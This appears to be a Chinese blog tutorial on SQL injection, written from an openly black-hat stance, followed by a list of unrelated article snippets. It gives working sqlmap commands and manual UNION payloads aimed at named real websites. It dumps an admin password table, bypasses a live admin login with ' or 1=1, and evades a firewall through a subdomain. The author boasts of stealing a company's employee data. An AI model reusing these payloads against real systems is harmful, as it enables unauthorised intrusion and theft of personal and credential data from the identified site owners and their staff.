SQL注入与简单实战
Example1
谁从小还没有一个当黑帽子的梦想呢,所以就来讲讲SQL💉🩸吧…
环境要求
- sqlmap命令行工具
- 使用Go语言安装包:waybackruls (需要在自己的电脑上部署)
寻找目标 url
对目标网站使用:
echo https://xxx | waybackurls
命令来打印历史 url 信息。如果运气好🍀会返回该网站的很多相关url信息,也有可能没有任何信息。在其中找到一个类似:https://xxxx/?value=xxx的查询路由,记住这条路由接下来使用sqlmap进行注入。
sqlmap 💉注入
【注入数据库】–current-db
使用这条命令进行注入:
sqlmap -u 'https://xxx?value=xxx' --current-db --random-agent
这条命令会检索当前的数据库的信息,遇到redirect直接Y回车即可。
可选参数以及作用:
--random-agent:如果注入后提示 timeout 超时⚠️,则应尝试该命令,伪装成随机的代理。--level=5 --threads=5:该命令可以使注入更快。
如果成功,将会得到一个提示信息(假设它的数据库是goodmoning_db):
current database: 'goodmoning_db' --random-agent
很显然,我没有得到它。但是如果你得到了这个,恭喜你🎉,可以继续往下注入!
【注入tables】-D ‘xxx_db’ --tables
在获得数据库后,我们可以通过sqlmap查询该库中有哪些table:
sqlmap -u 'https://mygm.in/?cat=1' -D goodmorning_db --tables --radom-agent
这里不妨假设你已经得到了一个可疑的查询url,并且你通过上面的步骤得到了一个数据库goodmorning_db,我们使用了随机代理来提高成功率。假设你成功了,那么你会得到一个tables的列表。
如果你发现有点满,试试上面提到的
--threads=5和--level=5这两个参数,我说过,他们可以提速!
【注入table】- T xxx --dump
假设在上一步你运气很好,得到了一个tables的表,其中有一个users的table:
xxx
xxx
xxx
users
xxx
那你就可以使用如下的命令进行
sqlmap -u 'https://mygm.in/?cat=1' -D goodmorning_db -T users --dump --threads=5 --random-agent
如果成功了,你将会得到表中的数据📊,运气好🍀将可能中奖得到管理员的账号密码,但有可能得到的密码是被加密的,你可能需要去解密它。
小结
虽然看起来很简单,但很可能第一步你都没办法实现,根据本人亲自试验,大部分网站无法使用waybackurls进行历史的追溯,如果能追溯的网站,也不太能被你找到漏洞。
实战
本来本人觉得学完可能也用不到,结果转折来了,我在网上根据网站的特征还真找到一个可以注入的网站,下面来一波教学~
首先,根据这篇博客,我们就能最大程度的找到能够sql注入的网站:寻找sql注入网站的方法,根据文章的方法,我们在搜索栏中输入想要的网站特征🤔:
一路试下来找到这样一个网站:
我们进去,在路由最后加一个引号会发现网站出现变化,原本搜索出来的内容消失了,这就代表出现了错误,只是没有显示给我们看而已!
继续往下寻找信息,会发现加后面加上' order by 1 -- -网站正常显示,但是如果 order by 8 -- -就又消失了,说明了两点:
- 网站对
sql注入基本不防护 - 该数据表有7列
使用order by 8会出现异常:
但是使用order by 1正常显示:
所有的这一切都在告诉我们一个信息,这个网站随便注入,所以打开kali终端进行sqlmap注入。
第一步,查询对应的数据库:
得到信息,数据库名为bygptech,这下跑不掉了。
利用该库名查询内部表:
查到内部的表如下:
这里面我看users最不爽😕,所以先拿它下手🤓,注入users:
拿到users内部数据,保存在该目录:
将csv拷贝到虚拟机外,工作结束🥸:
可以看出来,这里的数据大多都是该公司的员工信息。
本人第一次hack别人的网站,有点小激动,各位大佬都坐好,误笑本菜。
Example2
Example1中使用了sqlmap一把梭,这次使用手动注入的方法。建议提前安装好Firefox浏览器,不然会很痛苦。
获取列数
首先使用'单引号来尝试注入网站,如果网站在被使用'注入后发生了变化,说明sql注入有概率可行。
通过在url后加上下面的代码来获取列的数量。
' order by 数字 -- -
该网站的sql代码原理如下:
注意下面有三个引号,其中两遍的引号都是数据库查询自带的,中间由于我们手动添加了一个引号,构造出了一个绕过的代码,请自行理解。
-- -:左边两个-表示注释,但是右边额外加了个一有点不明所以的-,这是因为在sql中,如果注释右边没有内容,有可能引发错误,所以一般会添加一个字符来占位,为了省事就直接使用-来作为注释的内容🥵。
select * from table where id='9' order by 3 -- - ';
将这里的column换成数字就可以按照指定列来进行排序,所以如果列的序号存在能被查询到结果,否则查询到的结果为空。
SQL中的原理如下:
-
首先创建了一张表作为测试
-
插入数据
-
正常查询的结果:
-
经过
order by的排序后的结果:
-
将成绩改成列的序号
然后在Firefox中安装HackerBar V2这个扩展,请不要错误安装HackBar,没有V2后缀的版本是收费的。
确认列数后并确保你安装了HackBar V2,我们按下F12,对于博阳科技官网,我发现他有7列。
寻找注入点
选择SQL>Union>Union All Select Statement,输入你的列数,自动生成了如下内容:
UNION ALL SELECT 1,2,3,4,5,6,7
复制它,将它替换原来的order by功能,url变成了:
http://www.bygptech.com/about.php?id=9 ' UNION ALL SELECT 1,2,3,4,5,6,7 -- 垃圾网站
这相当于是在说,把7列的查询结果合并成一张表交给前端,但是实际上你这么做了页面也没有任何的变化。你需要将它改为:
http://www.bygptech.com/about.php?id=-9 ' UNION ALL SELECT 1,2,3,4,5,6,7 -- 垃圾网站
你可能已经注意到了,我们把id的查询改为了-9,但其实你可以试试,id等于多少并不重要,你可以随意将它改为123或者-1231之类的任何值,但只要他不是一个有效的值,你就可以绕过正常的查询。
我们还是继续来猜测sql中的原理:
如果没有绕过,union 查询将会有一个正确查询到的结果,并上我们后面自己添加的三个值,这就是我们要修改id的值的原因以及原理。
我们之所以需要获取列数量的信息,就是因为下面这个例子,如果Union查询并上的列数量不一致就会报错。
再来一个例子:
我么可以得到结论,使用id="-9"是为了让查询到的id结果为空,这样最后的结果只有我们union上的数据作为给前端唯一数据,才能让我们想要的数据渲染到页面上。UNION SELECT后面的合并数量要和table中的列数量一致,但是值是什么都行。
嗅探数据库基本信息
根据结果,我们可以看到,页面只渲染了第二列和第四列位置的值,所以我们只需要将2和4改成我们想知道的值,他就会被渲染到页面上,我们就可以嗅探到数据库内部的一些重要信息,例如数据库版本等。
例如,可以把url中的2换成database(),然后你就可以看到数据库的名字是什么了。
像这样的sql内建函数有很多,我们不一定记得住,不过没有关系!☝️🤓我们不是安装了HackBar V2吗,骇客神条会给你答案,下面是操作方法:
在HackBar V2中选择SQL>Union>Basic info column,得到的就是基本的信息函数。
CONCAT_WS(CHAR(32,58,32),user(),database(),version())
嗅探表明
我们可以使用如下命令
http://www.bygptech.com/about.php?id=114514 ' UNION ALL SELECT 1,2,3,group_concat(table_name),5,6,7 from information_schema.tables where table_schema=database() -- 垃圾网站
然后你会得到database()这张表中的所有表名,我们来分析一下🧐:
首先查询这句sql,能得到一个关于databse()数据库的表,其中有两列需要关注:TABLE_NAME,TABLE_SCHEMA。这句话从information_schema这个信息数据库中查询tables表,并从tables表中筛选出数据库为database()的信息。
SELECT * FROM information_schema.`TABLES` WHERE table_schema=DATABASE();
通过group_cancat()可以将某一列中的值拼成一句,就得到了所有的table。
查询到表的集合会被渲染在页面上:
唯一的问题就是,它不是很简单易读,所以可以这样做来增加它的易读性,也就是在每一个,后面增加一个换行。
http://www.bygptech.com/about.php?id=114514 ' UNION ALL SELECT 1,group_concat(table_name, '<br>'),3,4,5,6,7 from information_schema.tables where table_schema=database() -- 垃圾网站
它们看起来很棒🎉不是吗?
嗅探列名
接下来我们将继续使用group_concat()来获取这里user表中的所有列名。
我们可以通过information中的COLUMNS这张表来得到所有数据库和数据表的列名信息,包括user。
如果将TABLE_NAME限制为具体的表名,再将结果进行group_concat()就可以在页面显示所有的列名。
所以,使用下面的命令来获取该网站的trade表中的列名:
http://www.bygptech.com/about.php?id=114514 ' UNION ALL SELECT 1,group_concat(column_name, '<br>'),3,4,5,6,7 from information_schema.columns where table_name='trade' -- 垃圾网站
可以嗅探到列名如下:
嗅探数据
接下来我们试试嗅探admin表中的密码:
admin表中的列如下:
adminid
,adminname
,password
,addtime
http://www.bygptech.com/about.php?id=114514 ' union select 1,group_concat(password, '<br>'),3,4,5,6,7 from admin; -- -
Example 3
灵活使用payloads
在这个例子将会教你如何绕过admin登陆表单,仅限于一些没有防护措施的网站。
就本人写这篇文章的时间节点,下面这个网站仍然可以作为你的实验:
https://www.sspf.in/admin/
搜索: sql payloads github,或者访问这个链接: Github注入网站
进入这个网站,你能看到很多注入的命令,使用这些命令作为表单的输入:
这里我输入' or 1=1 limit 1 -- -作为Username,'作为Password,结果也是相当粗暴(成功绕过后台登陆):
Example 4
再这个例子中,你将会得到更强的提升,我将会以一个带有域名防火墙的网站作为例子。
安装工具
你需要一个subfinder,这是一个基于Go语言的命令行工具,你可以通过下面的命令安装他,不过前提是你已经安装了Go,如果没有,使用brew来安装Go再继续。
go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
尝试注入
这是我们需要黑入的网站,我已经帮你找好了它的注入点:
访问下面这个url这是我们需要攻击的目标:
https://nied.co.in/course.php?course=1
根据之前所学,如果想要手动黑入该网站,需要先嗅探列的数量:
https://nied.co.in/course.php?course=1 ' order by 40 -- -
根据算法的知识,我们可以使用二分法来测试列的数量,这样时间复杂度可以到达指数级别。根据本人亲测,该网站有40列。
下一步就是打开黑客条V2来进行Union查询。
https://nied.co.in/course.php?course=1 ' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40
然后你就会遇到今天最幸运的事情,没错,一个防火墙 - “FireWall”!😄
你以为这就结束了吗,不不不,我们可以做到,相信黑帽子!对于防火墙来说,很有可能只是对特定的域名做了防火墙的防护。所以如果使用子域名来进行注入,就有可能成功。
使用 subfinder
打开终端,终于轮到subfinder登场💡:
subfinder -d nied.co.in
由于网站在外🕸️,速度较慢,我们等待一段时间⌛️。
到这里,所有的问题都已经解决,该网站的数据库将向你敞开,尽情地用💉扎它吧。将原来的域名替换成这里的域名。例如,将域名换成mail.nied.co.in是亲测有效的注入域名:
https://mail.nied.co.in/course.php?course=1 ' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40
在浏览器中输入后将会得到该网站的信息。
相关文章:
SQL注入与简单实战
Example1 谁从小还没有一个当黑帽子的梦想呢,所以就来讲讲SQL💉🩸吧… 环境要求 sqlmap命令行工具使用Go语言安装包:waybackruls (需要在自己的电脑上部署) 寻找目标 url 对目标网站使用: echo https://xxx | wayb…...
ffmpeg 元数据
ffmpeg 元数据 1. 解释什么是ffmpeg元数据 ffmpeg元数据是指与音视频文件相关的附加信息,这些信息不直接影响音视频内容的播放,但提供了关于文件内容、创作者、版权、播放参数等的有用信息。元数据在音视频文件的处理、管理和共享中起着重要作用。 2.…...
Qwen3 正式发布
2025 年 4 月 29 日,阿里巴巴正式发布新一代通义千问模型 Qwen31。此次发布的 Qwen3 包含多种模型版本,具体如下: MoE 模型:有 Qwen3-235B-A22B(总参数 2350 亿,激活参数 220 亿)和 Qwen3-30B-A…...
[操作系统] 线程互斥
文章目录 背景概念线程互斥的引出互斥量锁的操作初始化 (Initialization)静态初始化动态初始化 加锁 (Locking)阻塞式加锁非阻塞式加锁 (尝试加锁/一般不考虑) 解锁 (Unlocking)销毁 (Destruction)设置属性 (Setting Attributes - 通过 pthread_mutex_init) 锁本身的保护互斥锁…...
时间序列(Time Series)论文总结)
KDD 2025 | (8月轮)时间序列(Time Series)论文总结
KDD 2025将在2025年8月3号到7号在加拿大多伦多举行,本文总结了KDD 2025(August Cycle)有关时间序列(Time Series)相关文章,共计11篇,其中1-10为Research Track,11为ADS Track。如有疏漏,欢迎补充…...
Spring MVC @PathVariable 注解怎么用?
我们来详细分析 Spring MVC 中的 PathVariable 注解。 PathVariable 注解的作用 PathVariable 注解用于从 URI 模板(URI Template)中提取值,并将这些值绑定到 Controller 方法的参数上。URI 模板是一种包含占位符的 URL 路径,这…...
PostgreSQL运算符
运算符 算数运算符 运算符描述示例加法SELECT 2 3; 结果为 5-减法SELECT 5 - 2; 结果为 3*乘法SELECT 2 * 3; 结果为 6/除法(对于整数相除,会截断小数部分)SELECT 5 / 2; 结果为 2 ,若要得到精确结果,可使用浮点数 …...
)
Ocelot与.NETcore7.0部署(基于腾讯云)
资料链接:https://download.csdn.net/download/ly1h1/90731290 1.效果 基于Ocelot,实现对3个微服务的轮询调用,实现不停机更新,无缝更新; 2.环境要求 1.部署环境:腾讯云的轻量化应用服务器 2.系统环境&…...
)
Umi-OCR项目(1)
最近接触到了一个项目,我在想能不能做出点东西出来。 目标:识别一张带表格的图片,要求非表格内容和表格内容都要识别得很好,并且可视化输出为word文档。 下面是第一步的测试代码,测试是否能够调用ocr能力。 import re…...
前端面试常问问题[From CV]
作为前端面试官,我会针对简历中的技术栈、项目经历和技能细节提出以下20个问题,并附上参考答案: 技术基础类问题 Q:请解释JavaScript事件循环机制,结合宏任务/微任务说明代码执行顺序 A:事件循环分为调用栈…...
C语言学习之动态内存的管理
学完前面的C语言内容后,我们之前给内存开辟空间的方式是这样的。 int val20; char arr[10]{0}; 我们发现这个方式有两个弊端:空间是固定的;同时在声明的时候必须指定数组的长度,一旦确定了大小就不能调整的。 而实际应用的过程中…...
CMake中的“包管理“模块FetchContent
背景介绍 C的包管理工具,好像除了微软家的vcpkg外,并没有一个特别有名的包管理器。 CMake其实也提供了基础的包管理功能。使用 FetchContent 模块系列命令可以下载项目依赖的源代码或者其他文件。 基本用法 FetchContent_Declare命令定义我们下载的内…...
python3基础
Python3 基础教程 1. Python简介 Python是一种高级、解释型、通用的编程语言,由Guido van Rossum于1989年底发明。Python的设计哲学强调代码的可读性和简洁性,其核心理念体现在"Python之禅"中: 优美胜于丑陋(Beautiful is better than ugly) 显式胜于隐式(E…...
,使用无迹卡尔曼滤波(UKF)的非线性滤波算法,MATLAB实现)
课题推荐——通信信号处理中的非线性系统状态估计(如信号跟踪、相位恢复等场景),使用无迹卡尔曼滤波(UKF)的非线性滤波算法,MATLAB实现
给出一个基于无迹卡尔曼滤波(UKF)的非线性滤波算法及其MATLAB实现,适用于通信信号处理中的非线性系统状态估计(如信号跟踪、相位恢复等场景)。该算法结合了非线性动态模型和观测模型,并通过UT变换避免雅可比…...
优化器nestloop参数化路径评估不准问题分析)
Postgresql源码(145)优化器nestloop参数化路径评估不准问题分析
相关 《Postgresql源码(133)优化器动态规划生成连接路径的实例分析》 1 问题 最近遇到一个问题,评估行数和真实行数存在较大差距,导致计划不准的问题。 nestloop内表评估是根据外表的参数来的。因为外表驱动表每取一条ÿ…...
【深度学习新浪潮】小米MiMo-7B报告内容浅析
一段话总结 该报告介绍了专为推理任务设计的大语言模型MiMo-7B,其在预训练阶段通过优化数据预处理、采用三阶段数据混合策略(处理约25万亿token)和引入MultiToken Prediction(MTP)目标提升推理潜力;后训练阶段构建13万可验证数学和编程问题数据集,结合测试难度驱动奖励…...
使用Python和Pandas实现的Snowflake权限检查与SQL生成用于IT审计
import snowflake.connector import pandas as pddef get_snowflake_permissions():# 连接Snowflake(需要替换实际凭证)conn snowflake.connector.connect(user<USER>,password<PASSWORD>,account<ACCOUNT>,warehouse<WAREHOUSE&g…...
spring 从application.properties中获取参数的四种方式
在Spring Boot中,自定义一个Starter时,从application.properties中获取参数主要有以下几种方法: 使用Value注解 这是最常用的方法之一,通过Value注解可以直接将application.properties中的属性值注入到Spring管理的Bean中。 imp…...
react学习笔记2——基于React脚手架与ajax
使用create-react-app创建react应用 react脚手架 xxx脚手架: 用来帮助程序员快速创建一个基于xxx库的模板项目 包含了所有需要的配置(语法检查、jsx编译、devServer…)下载好了所有相关的依赖可以直接运行一个简单效果 react提供了一个用于创建react项…...
nim模块教程
导入一个模块 如果我们想要导入一个模块,并且和它的所有函数,我们要做的是写import <moduleName>在我们的文件里,这通常是在文件顶部进行的,这样我们就可以很容易地看到我们的代码使用了什么。 创建一个模块 first.nim …...
雅马哈SMT贴片机高效精密制造解析
内容概要 作为电子制造领域的核心装备,雅马哈SMT贴片机通过集成高速运动控制、智能视觉识别与模块化供料三大技术体系,构建了精密电子元件贴装的工业化解决方案。其YSM系列设备在5G通讯模组、汽车电子控制器及智能穿戴设备等场景中,实现了每…...
审计专员简历模板
模板信息 简历范文名称:审计专员简历模板,所属行业:其他 | 职位,模板编号:KSJYVR 专业的个人简历模板,逻辑清晰,排版简洁美观,让你的个人简历显得更专业,找到好工作。希…...
(指由宿主环境提供的依赖))
npm宿主依赖、宿主环境依赖(peerDependencies)(指由宿主环境提供的依赖)
文章目录 宿主环境依赖详解基本概念工作原理应用场景插件开发UI组件库 与其他依赖类型对比npm不同版本处理差异npm v3-v6npm v7 实际应用示例React插件开发 解决宿主依赖问题 宿主环境依赖详解 基本概念 宿主环境依赖(peerDependencies)是指包声明自身…...
 全攻略)
Android Kotlin 项目集成 Firebase Cloud Messaging (FCM) 全攻略
Firebase Cloud Messaging (FCM) 是 Google 提供的跨平台消息推送解决方案。以下是在 Android Kotlin 项目中集成 FCM 的详细步骤。 一、前期准备 1. 创建 Firebase 项目 访问 Firebase 控制台点击"添加项目",按照向导创建新项目项目创建完成后&#x…...
游戏引擎学习第252天:允许编辑调试值
回顾并为今天的工作设定目标 我们处理了调试值(debug value)的编辑功能。我们希望实现可以在调试界面中编辑某些值,为此还需要做一些额外的工作。 我们的问题在于:当某个调试值被编辑时,我们需要把这个“编辑”的操作…...
支持selenium的chrome driver更新到136.0.7103.49
最近chrome释放新版本:136.0.7103.49 如果运行selenium自动化测试出现以下问题,是需要升级chromedriver才可以解决的。 selenium.common.exceptions.SessionNotCreatedException: Message: session not created: This version of ChromeDriver only su…...
cPanelWHM 的 AutoSSL
在 cPanel&WHM 的第58版本中,开始增加了AutoSSL,这是一项非常棒的新功能。 什么是 AutoSSL? AutoSSL 是为了解决每个使用 cPanel&WHM 用户的最大难题:SSL 证书的安装和续期。有了 AutoSSL,这个问题就不再是问…...
MySQL数据同步之Canal讲解
文章目录 1 Canal搭建1.1 简介1.1.1 概述1.1.2 优点1.1.3 作用&核心组件 1.2 搭建 Canal1.2.1 准备工作1.2.1.1 检查配置1.2.1.2 MySQL配置 1.2.2 下载并安装 Canal1.2.3 配置 Canal Server1.2.3.1 全局配置1.2.3.2 实例配置1.2.3.3 配置目标系统1.2…...
完整迁移物理机Windows XP到PVE8
计划对2007年部署的windows_xp_professional _service_pack_2_x86系统主机,进行重新部署,由于确实环境包和软件包,无法从头部署,只能考虑带系统环境迁移。原主机年代台久远(1Ghz处理器,1G内存)G…...
量子加密通信:打造未来信息安全的“铜墙铁壁”
在数字化时代,信息安全已成为全球关注的焦点。随着量子计算技术的飞速发展,传统的加密算法面临着前所未有的挑战。量子计算机的强大计算能力能够轻易破解现有的加密体系,这使得信息安全领域急需一种全新的加密技术来应对未来的威胁。量子加密…...
 : 画廊问题)
11.多边形的三角剖分 (Triangulation) : 画廊问题
目录 1.Methodology 编辑2. Definition 3. Lower & Upper Bound 4.Hardness 5.Approximation & Classification 6. Necessity of floor(n/3) 1.Methodology 多边形三角剖分 点集三角剖分 2. Definition 假设存在一个艺术馆,里面存在很大艺术品需…...
[蓝桥杯 2023 国 Python B] 划分 Java
import java.util.*;public class Main {public static void main(String[] args) {Scanner sc new Scanner(System.in);int[] arr new int[41];int sum 0;for (int i 1; i < 40; i) {arr[i] sc.nextInt();sum arr[i];}sc.close();int target sum / 2; // 最接近的两…...
计算机网络——HTTP/IP 协议通俗入门详解
HTTP/IP 协议通俗入门详解 一、什么是 HTTP 协议?1. 基本定义2. HTTP 是怎么工作的? 二、HTTP 协议的特点三、HTTPS 是什么?它和 HTTP 有啥区别?1. HTTPS 概述2. HTTP vs HTTPS 四、HTTP 的通信过程步骤详解: 五、常见…...
渗透测试中的那些“水洞”:分析与防御
1. Nginx 版本泄露 风险分析: Nginx 默认会在响应头中返回 Server: nginx/x.x.x,攻击者可利用该信息匹配已知漏洞进行攻击。 防御措施: 修改 nginx.conf 配置文件,隐藏版本信息:server_tokens off;使用 WAF 进行信息…...
攻防世界 - Misc - Level 3 | 3-1
🌟 关注这个靶场的其它相关笔记:CTF 靶场笔记 —— 攻防世界(XCTF) 过关思路合集 0x01:考点速览 本题考察的是 Misc 中的流量分析题,想要通过此关,你需要具备以下技术: 会通过 010 …...
安装linux下的idea
1.有可能传不了文件 2.按这个包里的流程装 通过网盘分享的文件:idea旗下所有产品.txt 链接: https://pan.baidu.com/s/1kHHkW3DB3z3a6CG0qnMkWA?pwdgg3f 提取码: gg3f...
【音频】基础知识
1、原始数据 1)音频信号:声音是一种机械波,经过麦克风等设备转化为电信号,再经过模数转换(ADC)变成数字信号,这个数字信号就是音频信号。 2)音频信号的参数: 采样率:一秒钟内对音频的模拟信号采样的个数; 8000Hz:主要用于电话通信 、满足基本的语音通信需求,同时…...
系统思考:企业效率提升关键
最近在辅导一家企业时,我们一起画出了这张图。老板说:“我每天都在救火,员工效率不高,我只能不断加班加点,亲自盯、亲自跑、亲自上阵……” 但图画出来才发现,问题不是出在员工不够努力,也不是老…...
MySQL 查找指定表名的表的主键
原理 SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.KEY_COLUMN_USAGE WHERE TABLE_NAME 表名 AND CONSTRAINT_NAME PRIMARY方法 public static String getPk(String tableName) {String sql "SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.KEY_COLUMN_USAGE WHERE TA…...
华为eNSP:IS-IS认证
一、什么是IS-IS认证? 华为eNSP中的IS-IS认证 IS-IS认证是华为eNSP网络中用于保障中间系统到中间系统(IS-IS)协议通信安全性的核心机制,通过身份验证和数据完整性校验防止非法路由信息注入或篡改。其实现方式与关键特性如下&…...
 -- qemu-system-arm使用)
qemu(4) -- qemu-system-arm使用
1. 前言 参考网上的资料,使用qemu中的vexpress_a9板子,跑一下Linux环境。 2. 源码 2.1 u-boot 可以到U-Boot官网下载对应的源码,我下载的是u-boot-2025.04-rc5.tar.gz,大约24MB。 3.2 linux 可以到The Linux Kernel Archive…...
JavaScript基础-递增和递减运算符
在JavaScript编程中,递增()和递减(--)运算符是操作数值变量的快捷方式。它们能够简洁地对变量值进行加一或减一的操作。尽管看似简单,但正确理解这两种运算符的不同使用方式(前缀与后缀)对于编写高效且无误的代码至关重要。本文将…...
解决Win10虚拟机“网络连接不上”,“Ethernet0 网络电缆被拔出”的问题
一、情景引入 今天用Win10虚拟机打开浏览器发现: 很奇怪,平常都没有这个问题。 二、检查网络状态 点击更改适配器选项,发现如下: 三、解决问题 打开任务管理器,点击服务,搜索栏搜索:VM …...
【Redis】String详细介绍及其应用场景
文章目录 String类型存储方式set命令get命令mset命令mget命令setnx命令setex和psetex命令incr和decr命令系列append命令--raw选项让redis尝试将二进制数据翻译 getrange命令setrange命令strlen命令字符串类型命令小结string内部的编码方式string类型的典型应用场景1.RedisMySQL…...
C++负载均衡远程调用学习之消息路分发机制
目录 1.LARV0.5-TCP_server链接管理的功能实现及测试 2.LARV0.6 3.LARV0.6 4.LARV0.6 5.LARV0.6-tcp_server集成 6.LARV0.6-tcp_server集成消息路由分发机制总结 7.LARV0.6回顾 1.LARV0.5-TCP_server链接管理的功能实现及测试 ### 16.2 完成Lars Reactor V0.12开发 ###…...
实现了一个基于寄存器操作STM32F103C8t6的工程, 并实现对PA1,PA2接LED正极的点灯操作
#include "stm32f10x.h"// 基于寄存器开发的项目了 int main(){RCC->APB2ENR 0x00000004; // 开启时钟GPIOA->CRL 0x00003330; // 配置引脚 // 0011 0011 0000GPIOA->ODR 0x0000000E; // 1110while(1){} }...
详解:从创建到操作全掌握)
Python字典(dict)详解:从创建到操作全掌握
前言 字典是可变容器,可存储任意类型对象 字典以键(key)-值(value)对的形式进行映射,键值对用冒号分割,对之间用逗号分割 d {key1 : value1, key2 : value2, key3 : value3 } 字典的数据是无序的 字典的键只能用不可变类型,且…...
UDP数据包和TCP数据包的区别;网络编程套接字;不同协议的回显服务器
目录 一、UDP 数据包与 TCP 数据包的区别: 连接方面: 传输方面: 面向对象: 双工模式: 二、UDP 网络编程套接字;基于 UDP 协议的回显服务器: 1. UDP 数据报套接字核心类 DatagramSocket &…...
Python 应用异常追踪实战:如何集成 Sentry 进行高效错误监控
Python 应用异常追踪实战:如何集成 Sentry 进行高效错误监控 引言 在现代应用开发中,异常处理和错误监控至关重要。一个小的运行时错误可能会导致整个系统崩溃,而难以发现的逻辑漏洞可能长期影响用户体验。为了提升代码的稳定性,我们需要一个高效的异常监控机制,以便能够…...
【数据结构】--- 双向链表的增删查改
前言: 经过了几个月的漫长岁月,回头时年迈的小编发现,数据结构的内容还没有写博客,于是小编赶紧停下手头的活动,补上博客以洗清身上的罪孽 目录 前言: 概念: 双链表的初始化 双链表的判空 双链表…...